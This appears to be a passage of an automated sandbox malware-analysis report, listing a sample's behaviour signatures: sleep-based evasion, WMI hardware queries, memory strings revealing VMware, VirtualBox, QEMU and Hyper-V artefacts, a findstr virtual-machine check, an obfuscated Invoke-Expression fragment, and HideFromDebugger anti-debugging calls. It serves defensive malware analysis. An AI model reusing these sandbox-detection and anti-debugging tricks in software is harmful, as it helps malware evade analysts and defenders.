Source: C:\Windows\System32\svchost.exe TID: 6332Thread sleep count: 554 > 30
Source: C:\Windows\System32\svchost.exe TID: 6332Thread sleep time: -55400s >= -30000s
Source: C:\Windows\System32\dwm.exe TID: 7152Thread sleep count: 276 > 30
Source: C:\Windows\System32\svchost.exe TID: 7024Thread sleep count: 192 > 30
Source: C:\Windows\System32\svchost.exe TID: 6260Thread sleep count: 523 > 30
Source: C:\Windows\System32\svchost.exe TID: 6260Thread sleep time: -52300s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 4328Thread sleep count: 511 > 30
Source: C:\Windows\System32\svchost.exe TID: 4328Thread sleep time: -51100s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 368Thread sleep count: 497 > 30
Source: C:\Windows\System32\svchost.exe TID: 368Thread sleep time: -49700s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 5244Thread sleep count: 439 > 30
Source: C:\Windows\System32\svchost.exe TID: 5244Thread sleep time: -43900s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 2584Thread sleep count: 492 > 30
Source: C:\Windows\System32\svchost.exe TID: 2584Thread sleep time: -49200s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 4388Thread sleep count: 461 > 30
Source: C:\Windows\System32\svchost.exe TID: 4388Thread sleep time: -46100s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 1032Thread sleep count: 459 > 30
Source: C:\Windows\System32\svchost.exe TID: 1032Thread sleep time: -45900s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 3916Thread sleep count: 472 > 30
Source: C:\Windows\System32\svchost.exe TID: 3916Thread sleep time: -47200s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 1396Thread sleep count: 461 > 30
Source: C:\Windows\System32\svchost.exe TID: 1396Thread sleep time: -46100s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 768Thread sleep count: 454 > 30
Source: C:\Windows\System32\svchost.exe TID: 768Thread sleep time: -45400s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 5332Thread sleep count: 457 > 30
Source: C:\Windows\System32\svchost.exe TID: 5332Thread sleep time: -45700s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 6708Thread sleep count: 447 > 30
Source: C:\Windows\System32\svchost.exe TID: 6708Thread sleep time: -44700s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 4396Thread sleep count: 449 > 30
Source: C:\Windows\System32\svchost.exe TID: 4396Thread sleep time: -44900s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 5320Thread sleep count: 444 > 30
Source: C:\Windows\System32\svchost.exe TID: 5320Thread sleep time: -44400s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 3492Thread sleep count: 445 > 30
Source: C:\Windows\System32\svchost.exe TID: 3492Thread sleep time: -44500s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_BaseBoard
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_BIOS
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\cmd.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\dllhost.exeLast function: Thread delayed
Source: C:\Windows\System32\dllhost.exeLast function: Thread delayed
Source: C:\Windows\System32\winlogon.exeLast function: Thread delayed
Source: C:\Windows\System32\winlogon.exeLast function: Thread delayed
Source: C:\Windows\System32\lsass.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\dwm.exeLast function: Thread delayed
Source: C:\Windows\System32\dwm.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\cmd.exeCode function: 17_2_00000253FC40D894 FindFirstFileExW,17_2_00000253FC40D894
Source: C:\Windows\System32\cmd.exeCode function: 17_2_00000253FC40DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,17_2_00000253FC40DA18
Source: C:\Windows\System32\cmd.exeCode function: 17_2_00000253FC43D894 FindFirstFileExW,17_2_00000253FC43D894
Source: C:\Windows\System32\cmd.exeCode function: 17_2_00000253FC43DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,17_2_00000253FC43DA18
Source: C:\Windows\System32\conhost.exeCode function: 18_2_000002A5AF36D894 FindFirstFileExW,18_2_000002A5AF36D894
Source: C:\Windows\System32\conhost.exeCode function: 18_2_000002A5AF36DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,18_2_000002A5AF36DA18
Source: C:\Windows\System32\conhost.exeCode function: 37_2_000001780DD2DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,37_2_000001780DD2DA18
Source: C:\Windows\System32\conhost.exeCode function: 37_2_000001780DD2D894 FindFirstFileExW,37_2_000001780DD2D894
Source: C:\Windows\System32\dllhost.exeCode function: 38_2_0000020175EBDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,38_2_0000020175EBDA18
Source: C:\Windows\System32\dllhost.exeCode function: 38_2_0000020175EBD894 FindFirstFileExW,38_2_0000020175EBD894
Source: C:\Windows\System32\dllhost.exeCode function: 38_2_0000020175EEDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,38_2_0000020175EEDA18
Source: C:\Windows\System32\dllhost.exeCode function: 38_2_0000020175EED894 FindFirstFileExW,38_2_0000020175EED894
Source: C:\Windows\System32\winlogon.exeCode function: 39_2_000002D0165ED894 FindFirstFileExW,39_2_000002D0165ED894
Source: C:\Windows\System32\winlogon.exeCode function: 39_2_000002D0165EDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,39_2_000002D0165EDA18
Source: C:\Windows\System32\winlogon.exeCode function: 39_2_000002D01661D894 FindFirstFileExW,39_2_000002D01661D894
Source: C:\Windows\System32\winlogon.exeCode function: 39_2_000002D01661DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,39_2_000002D01661DA18
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\dllhost.exeThread delayed: delay time: 922337203685477
Source: svchost.exe, 00000031.00000000.2819574872.0000022E66A2B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000002.3415075913.0000022E66A2B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: @Microsoft-Windows-Hyper-V-Hypervisor
Source: powershell.exe, 00000008.00000002.2406288380.000001D49FE57000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: vboxsf.sys
Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.49.drBinary or memory string: LSI_SASVMware Virtual disk 6000c2942fce4d06663969f532e45d1a
Source: powershell.exe, 00000008.00000002.2406288380.000001D49FAC9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: qemuwmi2
Source: Microsoft-Windows-Storsvc%4Diagnostic.evtx.49.drBinary or memory string: VMware Virtual disk 2.0 6000c2942fce4d06663969f532e45d1aPCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218E0F40&0&00NTFS
Source: powershell.exe, 00000008.00000002.2406288380.000001D49FD67000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V Heartbeat Service
Source: System.evtx.49.drBinary or memory string: VMCI: Using capabilities (0x1c).
Source: Amcache.hve.11.drBinary or memory string: vmci.sys
Source: powershell.exe, 00000008.00000002.2406288380.000001D49FC8C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: vmware
Source: powershell.exe, 00000008.00000002.2406288380.000001D49FD67000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: $Hyper-V Volume Shadow Copy Requestor
Source: Amcache.hve.11.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.11.drBinary or memory string: VMware PCI VMCI Bus Device
Source: Microsoft-Windows-Storsvc%4Diagnostic.evtx.49.drBinary or memory string: VMware
Source: Amcache.hve.11.drBinary or memory string: VMware Virtual RAM
Source: Amcache.hve.11.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: powershell.exe, 00000008.00000002.2406288380.000001D49FE57000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: vboxguest.sys
Source: Microsoft-Windows-PowerShell%4Operational.evtx.49.drBinary or memory string: if(($pr.Name -eq "Caption" -or $pr.Name -eq "Name" -or $pr.Name -eq "PNPDeviceID" -or $pr.Name -eq "AdapterCompatibility" -or $pr.Name -eq "Description" -or $pr.Name -eq "InfSection" -or $pr.Name -eq "VideoProcessor") -and ($pr.Value -match 'VBOX' -or $pr.Value -match 'VBox' -or $pr.Value -match 'VMWARE' -or $pr.Value -match 'VirtualBox' -or $pr.Value -match 'VMware' -or $pr.Value -match 'Oracle Corporation' -or $pr.Value -match 'Microsoft Basic Display Adapter'))
Source: powershell.exe, 00000008.00000002.2406288380.000001D49FD67000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: vmicheartbeat
Source: Amcache.hve.11.drBinary or memory string: VMware Virtual USB Mouse
Source: powershell.exe, 00000008.00000002.2406288380.000001D49FAC9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: QEMU HARDDISK
Source: Amcache.hve.11.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: powershell.exe, 00000008.00000002.2406288380.000001D49FD67000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VBoxMouse.sys
Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.49.drBinary or memory string: storahciNECVMWarVMware SATA CD00
Source: Amcache.hve.11.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Microsoft-Windows-Storsvc%4Diagnostic.evtx.49.drBinary or memory string: VMware Virtual disk 2.0 6000c29c2bea38880a8a16ee9f37bec9PCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218E0F40&0&00NTFS
Source: Amcache.hve.11.drBinary or memory string: vmci.syshbin`
Source: Amcache.hve.11.drBinary or memory string: \driver\vmci,\driver\pci
Source: cmd.exe, 00000011.00000003.2404007494.00000253FC17D000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000003.2414667829.00000253FC177000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000003.2414573614.00000253FC177000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000003.2414801651.00000253FC177000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000003.2404051341.00000253FC178000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000003.2414965006.00000253FC177000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Users\user\Desktop\C:\Windows\system32\findstr.exefindstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox" findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox" Winsta0\Default=::=::\=C:=C:\Users\user\DesktopAbHorsAGfLWFjJNrKHvWocR=e-Expression 'adnRtmnvxKrKceiWEAAFQW=ion '$TIMGz=qVaeeTRxshUrjZxfqxJBFkNYzLaL=lckmblckpblckrAfNoxIvdXhTBbvJNzCkKYxLKaXkycRIThPnjF=kmblck($Vcvep,AGZcOpprjzwDmCNlvINgjjZlHsYSLqNSSCis=lckSblckyblcksAhnCzrQTYKNgoLUmdjzOYMYqKajhkheLybvqwPqKmnHEAeKjNfwbgEgNiWSyiIJQFcHnpDPnTPBLfuQGqZ
Source: Microsoft-Windows-PowerShell%4Operational.evtx.49.drBinary or memory string: $value = $pr.Value.replace("VBOX", $value).replace("VBox", $value).replace("VMWARE", $value).replace("VMware", $value).replace("VirtualBox", $value).replace("Oracle Corporation", $value).replace("Microsoft Basic Display Adapter", $value)
Source: powershell.exe, 00000008.00000002.2406288380.000001D49FD67000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VBoxGuest.sys
Source: powershell.exe, 00000008.00000002.2406288380.000001D49FD67000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: !Hyper-V PowerShell Direct Service
Source: Microsoft-Windows-PowerShell%4Operational.evtx.49.drBinary or memory string: if(($pr.Name -eq "DeviceId" -or $pr.Name -eq "Caption" -or $pr.Name -eq "Model" -or $pr.Name -eq "PNPDeviceID") -and ($pr.Value -match 'VBOX' -or $pr.Value -match 'VBox' -or $pr.Value -match 'VMWARE' -or $pr.Value -match 'VMware'))
Source: Amcache.hve.11.drBinary or memory string: VMware
Source: Microsoft-Windows-PowerShell%4Operational.evtx.49.drBinary or memory string: if(($pr.Name -eq "DeviceId" -or $pr.Name -eq "Caption" -or $pr.Name -eq "Name" -or $pr.Name -eq "PNPDeviceID" -or $pr.Name -eq "Service" -or $pr.Name -eq "Description") -and ($pr.Value -match 'VEN_80EE' -or $pr.Value -match 'VEN_15AD' -or $pr.Value -match 'VBOX' -or $pr.Value -match 'VBox' -or $pr.Value -match 'VMWARE' -or $pr.Value -match 'VMWare' -or $pr.Value -match 'VMware' -or $pr.Value -match '82801FB' -or $pr.Value -match '82441FX' -or $pr.Value -match '82371SB' -or $p43da5e64-eb7b-4fa8-a45c-cf68357b99d6C:\Program Files (x86)\Joebox\unpack\wmievasions.ps1lp.
Source: dwm.exe, 0000002A.00000000.2781110332.000001D156AA0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000gB
Source: powershell.exe, 00000008.00000002.2406288380.000001D49FE57000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: vboxservice
Source: svchost.exe, 00000031.00000000.2819741090.0000022E66A43000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: (@vmci
Source: powershell.exe, 00000008.00000002.2406288380.000001D49FE57000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: vmusrvc2
Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.49.drBinary or memory string: VMware SATA CD00
Source: Amcache.hve.11.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: svchost.exe, 0000002F.00000002.3453193611.00000200A2218000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: zSCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000_0r
Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.49.drBinary or memory string: NECVMWarVMware SATA CD00
Source: svchost.exe, 00000031.00000002.3426686743.0000022E67060000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: D8VMwareVirtual disk6000c29c2bea38880a8a16ee9f37bec9
Source: Amcache.hve.11.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Microsoft-Windows-StorageSpaces-Driver%4Operational.evtx.49.drBinary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1ap
Source: Microsoft-Windows-PowerShell%4Operational.evtx.49.drBinary or memory string: $value = $pr.Value.replace("VBOX", $value).replace("VBox", $value).replace("VMWARE", $value).replace("VMware Virtual disk", $value).replace("VMware", $value).replace("HARDDISK", "WDC").replace("VIRTUAL_DISK", $value)
Source: Microsoft-Windows-StorageSpaces-Driver%4Operational.evtx.49.drBinary or memory string: D8VMwareVirtual disk6000c29c2bea38880a8a16ee9f37bec98
Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.49.drBinary or memory string: LSI_SASVMware Virtual disk 6000c29c2bea38880a8a16ee9f37bec9
Source: svchost.exe, 00000029.00000000.2774511050.0000014E41C13000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
Source: Microsoft-Windows-PowerShell%4Operational.evtx.49.drBinary or memory string: $value = $pr.Value.replace("VEN_80EE", $value).replace("VEN_15AD", $value).replace("VBOX", $value).replace("VBox", $value).replace("VMWARE", $value).replace("82801FB", $value).replace("82441FX", $value).replace("82371SB", $value).replace("OpenHCD", $value).replace("VMWare", $value).replace("VMware", $value)
Source: powershell.exe, 00000008.00000002.2406288380.000001D49FAC9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: qemu-ga
Source: powershell.exe, 00000008.00000002.2406288380.000001D49FD67000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: vmicshutdown
Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.49.drBinary or memory string: nonicNECVMWarVMware SATA CD00
Source: Microsoft-Windows-StorageSpaces-Driver%4Operational.evtx.49.drBinary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1a@
Source: powershell.exe, 00000008.00000002.2406288380.000001D49FD67000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: $Hyper-V Time Synchronization Service
Source: Amcache.hve.11.drBinary or memory string: VMware20,1
Source: powershell.exe, 00000008.00000002.2406288380.000001D49FD67000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: vmicvss
Source: Amcache.hve.11.drBinary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.11.drBinary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.11.drBinary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.11.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: svchost.exe, 00000031.00000000.2821524945.0000022E6747B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: vmciAP<
Source: svchost.exe, 00000031.00000000.2821695169.0000022E6749C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: dowvmci
Source: Amcache.hve.11.drBinary or memory string: VMware VMCI Bus Device
Source: Microsoft-Windows-PushNotification-Platform%4Operational.evtx.49.drBinary or memory string: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
Source: powershell.exe, 00000008.00000002.2406288380.000001D49FD67000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V Data Exchange Service
Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.49.drBinary or memory string: nonicVMware Virtual disk 6000c29c2bea38880a8a16ee9f37bec9
Source: powershell.exe, 00000008.00000002.2406288380.000001D49FD67000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: vmmouse.sys
Source: powershell.exe, 00000008.00000002.2406288380.000001D49FD67000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Service Interface
Source: powershell.exe, 00000008.00000002.2406288380.000001D49FD67000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: -Hyper-V Remote Desktop Virtualization Service
Source: Amcache.hve.11.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
Source: lsass.exe, 00000028.00000002.3408803122.000002D6F0688000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: pvmicvssNT SERVICE
Source: Amcache.hve.11.drBinary or memory string: vmci.syshbin
Source: Amcache.hve.11.drBinary or memory string: VMware, Inc.
Source: Amcache.hve.11.drBinary or memory string: VMware20,1hbin@
Source: Amcache.hve.11.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.11.drBinary or memory string: VMware-42 27 80 4d 99 30 0e 9c-c1 9b 2a 23 ea 1f c4 20
Source: powershell.exe, 00000008.00000002.2406288380.000001D49FE57000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: vboxmouse.sys
Source: Amcache.hve.11.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: powershell.exe, 00000008.00000002.2406288380.000001D49FD67000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: C:\Program Files\VMware
Source: Microsoft-Windows-StorageSpaces-Driver%4Operational.evtx.49.drBinary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1a8
Source: Microsoft-Windows-PushNotification-Platform%4Operational.evtx.49.drBinary or memory string: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>art(
Source: Microsoft-Windows-Partition%4Diagnostic.evtx.49.drBinary or memory string: VMwareVirtual disk2.06000c2942fce4d06663969f532e45d1aPCI Slot 32 : Bus 2 : Device 0 : Function 0 : Adapter 0 : Port 0 : Target 0 : LUN 0PCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218e0f40&0&00
Source: Amcache.hve.11.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
Source: lsass.exe, 00000028.00000000.2769194456.000002D6F0613000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3404687627.000002D6F0613000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000029.00000002.3394717290.0000014E41C13000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000029.00000000.2774511050.0000014E41C13000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002C.00000002.3407396288.0000023C9FE2B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002C.00000000.2798624056.0000023C9FE2B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002D.00000000.2802138190.000001A1CA034000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002D.00000002.3395077606.000001A1CA02A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002F.00000000.2812656244.00000200A1241000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002F.00000002.3408969107.00000200A1241000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000002.3416713166.0000022E66A43000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: powershell.exe, 00000008.00000002.2406288380.000001D49FD67000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Shutdown Service
Source: lsass.exe, 00000028.00000002.3408803122.000002D6F0688000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: pvmicshutdownNT SERVICE
Source: Amcache.hve.11.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.49.drBinary or memory string: nonicVMware Virtual disk 6000c2942fce4d06663969f532e45d1a
Source: svchost.exe, 00000036.00000000.2839389298.00000227D882B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTVMWare
Source: svchost.exe, 00000031.00000002.3464975209.0000022E67EE7000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: s\Gvmci
Source: svchost.exe, 0000002D.00000000.2801923475.000001A1CA000000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcUmRdpServiceDsSvcfhsvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionsvsvcStorSvcWwanSvcvmicvssDevQueryBrokerNgcSvcsysmainNetmanTabletInputServicePcaSvcDisplayEnhancementServiceIPxlatCfgSvcDeviceAssociationServiceNcbServiceEmbeddedModeSensorServicewlansvcCscServiceWPDBusEnumMixedRealityOpenXRSvc
Source: Amcache.hve.11.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: powershell.exe, 00000008.00000002.2406288380.000001D49FE57000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: c:\program files\vmware
Source: lsass.exe, 00000028.00000002.3408803122.000002D6F0688000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: pvmicheartbeatNT SERVICE
Source: powershell.exe, 00000008.00000002.2406288380.000001D49FD67000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VBoxSF.sys
Source: dwm.exe, 0000002A.00000002.3466156468.000001D156B0A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: Microsoft-Windows-Partition%4Diagnostic.evtx.49.drBinary or memory string: VMwareVirtual disk2.06000c29c2bea38880a8a16ee9f37bec9PCI Slot 32 : Bus 2 : Device 0 : Function 0 : Adapter 0 : Port 0 : Target 0 : LUN 0PCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218e0f40&0&00
Source: C:\Windows\System32\dllhost.exeAPI call chain: ExitProcess graph end nodegraph_38-15505
Source: C:\Windows\System32\dllhost.exeAPI call chain: ExitProcess graph end nodegraph_38-15663
Source: C:\Windows\System32\wbem\WMIC.exeProcess information queried: ProcessInformation

Anti Debugging

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebugger
